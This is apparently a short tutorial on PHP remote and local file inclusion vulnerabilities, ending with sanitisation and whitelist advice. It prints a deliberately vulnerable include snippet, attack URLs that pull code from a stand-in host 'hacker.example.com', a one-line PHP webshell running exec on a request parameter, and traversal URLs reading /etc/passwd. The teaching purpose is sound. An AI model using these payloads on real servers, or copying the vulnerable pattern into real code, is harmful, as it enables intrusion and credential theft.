Possible threats arising out of File Inclusion vulnerabilities are - code execution on server as well as client side, can lead to other types of attacks such as Cross Site Scripting and Denial of Service, and also manipulation or deletion of critical data.
File Inclusion vulnerabilities are pretty straightforward and easy to understand.
User input is accept into a PHP page through $_GET, $_POST and $_COOKIE. The problem arises when these inputs are passed to functions like 'include' and 'require' without validation. Attackers can alter the variables being passed to these functions to include crafted remote pages having malicious code. This malicious code will then get executed on the victim server and hence, compromising its security.
Consider this example code taken from wikipedia,
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' ) ;
?>
The user accepted parameter 'COLOR' is passed to the include function through $color variable. an attacker can replace the name of color by something like this.
http://hacker.example.com/evilcode.txt?Therefore the resulting URL will look like this.
http://localhost/rfivuln.php?color=http://hacker.example.com/evilcode.txt?This will inject a remote file evilcode.txt which can have malicious code or it can be a webshell.
Local files that are already present on the webserver can also be included.
http://localhost/rfivuln.php?color=C:\\www\\uploads\\webshell.txtHere, is a null character indicating the end of the URL which helps to get rid of appending '.php' extension. webshell.txt is a file attacker uploaded on the web server which can execute commands passed to it as argument. contents of the webshell.txt may be...
<?php
$cmd = $_GET['cmd'];
exec($cmd);
?>LFI can be used to perform directory traversal which can give access to some critical files.
http://localhost/lfivuln.php?color=/../../../something/criticalOr to extract username and passwords from local machine.
http://localhost/lfivuln.php?color=/etc/passwd
For the prevention of file inclusion vulnerabilities, the user input must be sanitized to escape dangerous characters such as '?', '/', ':' or keywords like 'http://'. Additionally, a white list of permitted pages to be included can be maintained. When the user enters the page they wish to include, this input is compared with all the entries present in the list and loaded only if a match is found.
I hope you found this informative :)